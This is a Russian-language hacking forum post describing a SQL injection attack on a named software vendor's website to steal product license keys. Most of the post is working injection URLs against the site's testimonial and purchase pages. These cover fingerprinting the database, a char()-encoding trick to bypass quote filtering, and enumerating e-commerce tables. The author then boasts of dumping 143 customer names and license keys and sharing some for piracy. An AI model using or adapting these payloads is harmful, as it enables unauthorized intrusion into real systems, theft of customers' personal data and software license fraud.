Т.к. инфа не вызвала интерес в опр. кругах, решил выложить в паблик может кому пригодится...
Просматривая как-то раздел "Сборник полезных прог(маст хев)" наткнулся на одну прогу:
Название проги:
PerfectDisk
Тип проги:
дефрагментатор
Лицензия:
Shareware
Подробное описание:
Мощный дефрагментатор жесткого диска, разработанный при поддержке Microsoft. Мне например отдефрагментировал диск который немогла отдефрагментирвать не одна программа до этого
Линк для закачки:
http://www.raxco.com/products/perfectdisk2k/
И так оф.сайт компании
www.raxco.com
Веб-сервер IIS, ну думаю наверно MSSQL и не ошибся.
Порывшись немного нашел скуль:
Код:
http://www.raxco.com/new/testimonial_details.cfm?TestimonialID=183+and+1
Далее стандартно версия, пользователь, имя БД:
Код:
http://www.raxco.com/new/testimonial_details.cfm?TestimonialID=1+or+1=@@version--
http://www.raxco.com/new/testimonial_details.cfm?TestimonialID=1+or+1=(select+system_user)--
http://www.raxco.com/new/testimonial_details.cfm?TestimonialID=1+or+1=(select+db_name())--
Version:Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
User:webman - оказался полный лох =\ никаких прав на master(процедуры) и права на добавление, изменение, удаление даже в своей БД.
DB:Testimonials
Далее узнаем имена таблиц:
Код:
http://www.raxco.com/new/testimonial_details.cfm?TestimonialID=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES
Но дальнейший вывод таблиц не катил - причина фильтрация кавычек!
Обходим:
Код:
http://www.raxco.com/new/testimonial_details.cfm?TestimonialID=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN(char(84)%2Bchar(95)%2bchar(84)%2bchar(101)%2bchar(115)%2bchar(116)%2bchar(105)%2bchar(109)%2bchar(111)%2bchar(110)%2bchar(105)%2bchar(97)%2bchar(108)%2bchar(115)))--
Причем ручками преобразовывать каждое имя к последовательности чаров, запарило пришлось писать маленький конвертор на пхп...(ничего сложного)
В результате в данной базе ниодной интересной таблицы =\
Сосвсем расстроился, но через несколько разделов сайта еще скуль:
Код:
http://www.raxco.com/products/commerce/purchase_options.cfm?ItemTitleID=1+or+1=(select+db_name())--
причем другая база!!!
DB:RaxcoEcommerce - только одно название чего стоит =)
Вытаскивал таблы минут 15, ппц запарился и все в ручную, приведу лишь малую часть запроса:
Код:
http://www.raxco.com/products/commerce/purchase_options.cfm?ItemTitleID=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+LIKE+char(84)%2Bchar(95)%2Bchar(66)%2Bchar(101)%2Bchar(115)%2Bchar(116)%2Bchar(37)+AND+TABLE_NAME+NOT+IN(char(84)%2Bchar(95)%2Bchar(73)%2Bchar(116)%2Bchar(101)%2Bchar(109)%2Bchar(84)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101),char(84)%2Bchar(95)%2Bchar(80)%2Bchar(68)%2Bchar(82)%2Bchar(88)%2Bchar(76)%2Bchar(105)%2Bchar(99)%2Bchar(101)%2Bchar(110)%2Bchar(115)%2Bchar(101)%2Bchar(75)%2Bchar(101)%2Bchar(121)%2Bchar(115),char(84)%2Bchar(95)%2Bchar(66)%2Bchar(101)%2Bchar(115)%2Bchar(116)%2Bchar(80)%2Bchar(114)%2Bchar(105)%2Bchar(99)%2Bchar(101)%2Bchar(95)%2Bchar(71)%2Bchar(77),char(84)%2Bchar(95)%2Bchar(66)%2Bchar(101)%2Bchar(115).......
В результате имеем таблицы:
Код:
sysconstraints
syssegments
T_BestPrice_DR
T_BestPrice_FR
T_BestPrice_GM
T_BestPrice_UK
T_CountryCodes
T_ExchangeRates
T_Item
T_ItemNFR
T_ItemTitle
T_Order
T_OrderItem
T_PDRXLicenseKeys
T_ProductDownload
T_PromoCodes
T_SAOrder
T_SAReorder
T_TrackingCodes
T_Values
T_WebToOnyx
Интересная естественно
T_PDRXLicenseKeys, смотрим колонки:
[T_PDRXLicenseKeys]
Код:
CreateDate
CreatedBy
CustomerEmail
CustomerName
LicenseId
LicenseKey
Ну а дальше дампим с помощью скрипта cash(ему кста огромный респ!) колонки CustomerName, LicenseKey
В результате 143 лиценцзии в формате name:key!
Здесь первые пять, думаю всем хватит:
скачать
Здесь описалово продукта http://www.raxco.com/products/PerfectDiskRxSuite/
![Аватар для [53x]Shadow](/avatars/avatar32248.jpg?457781){kind=avatar}
Лицензируемся через SQL-injection =)
Древовидный вид